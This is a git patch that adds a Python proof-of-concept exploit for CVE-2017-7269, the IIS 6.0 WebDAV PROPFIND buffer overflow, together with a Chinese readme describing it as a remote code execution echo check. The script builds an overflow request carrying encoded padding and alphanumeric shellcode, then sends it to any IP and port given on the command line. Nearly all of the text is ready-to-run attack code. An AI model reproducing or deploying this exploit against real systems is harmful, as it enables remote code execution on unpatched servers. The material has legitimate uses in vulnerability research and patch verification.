From a9b79f18bf3f8e94cb05e115b133afe836321dc6 Mon Sep 17 00:00:00 2001
From: mr-xn <mrxn.net@gmail.com>
Date: Tue, 20 Aug 2019 12:00:50 +0800
Subject: [PATCH] upload CVE-2017-7269

---
 .../CVE-2017-7269_remote_echo.py              |  42 ++++++++++++++++++
 IIS/CVE-2017-7269-Echo-PoC/example.png        | Bin 0 -> 5717 bytes
 IIS/CVE-2017-7269-Echo-PoC/readme.md          |  17 +++++++
 3 files changed, 59 insertions(+)
 create mode 100644 IIS/CVE-2017-7269-Echo-PoC/CVE-2017-7269_remote_echo.py
 create mode 100644 IIS/CVE-2017-7269-Echo-PoC/example.png
 create mode 100644 IIS/CVE-2017-7269-Echo-PoC/readme.md

diff --git a/IIS/CVE-2017-7269-Echo-PoC/CVE-2017-7269_remote_echo.py b/IIS/CVE-2017-7269-Echo-PoC/CVE-2017-7269_remote_echo.py
new file mode 100644
index 0000000..c09eb3b
--- /dev/null
+++ b/IIS/CVE-2017-7269-Echo-PoC/CVE-2017-7269_remote_echo.py
@@ -0,0 +1,42 @@
+
+import socket
+import sys
+import time
+
+def generate_payload(port):
+    pay='PROPFIND / HTTP/1.1\r\nHost: localhost:'+ port  +'\r\nContent-Length: 0\r\n'
+    pay+='If: <http://localhost:' + port + '/aaaaaaa'
+    pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
+    pay+='>'
+    pay+=' (Not <locktoken:write1>) <http://localhost:' + port + '/bbbbbbb'
+    pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
+    shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTKOXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBNVO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGNX9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPPSKOYEKPA'
+    pay+=shellcode
+    pay+='>\r\n\r\n'
+    return pay
+
+def send_pack(ip,port=80) :
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.connect((ip,port))
+    time_tick=time.time()
+    sock.send(generate_payload(str(port)))
+    
+    try :
+        data = sock.recv(80960)  
+    except :
+        pass
+    
+    print data
+    
+    sock.close()
+    
+    if not -1==data.find('HHIT CVE-2017-7269 Success') :
+        return True
+    
+    return False
+    
+    
+if 2==len(sys.argv) :
+    print send_pack(sys.argv[1])
+else :
+    print send_pack(sys.argv[1],int(sys.argv[2]))
diff --git a/IIS/CVE-2017-7269-Echo-PoC/example.png b/IIS/CVE-2017-7269-Echo-PoC/example.png
new file mode 100644
index 0000000000000000000000000000000000000000..afdc63f91c1e908090bd680b27be1596afd72066
GIT binary patch
literal 5717
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

literal 0
HcmV?d00001

diff --git a/IIS/CVE-2017-7269-Echo-PoC/readme.md b/IIS/CVE-2017-7269-Echo-PoC/readme.md
new file mode 100644
index 0000000..0e1e92c
--- /dev/null
+++ b/IIS/CVE-2017-7269-Echo-PoC/readme.md
@@ -0,0 +1,17 @@
+
+### CVE-2017-7269 远程代码执行回显验证
+
+---
+我们团队对此次 CVE-2017-7269 漏洞的分析报告: https://ht-sec.org/cve-2017-7269-vulnerabilities/
+
+默认PoC 只能弹`calc.exe` ,现在修改成可以响应请求,命令格式为:<br/>
+
+CVE-2017-7269_remote_echo.py ip_address port
+
+<br/>
+
+效果如下:<br/>
+
+![](./example.png)
+
+来源: https://github.com/lcatro/CVE-2017-7269-Echo-PoC   
\ No newline at end of file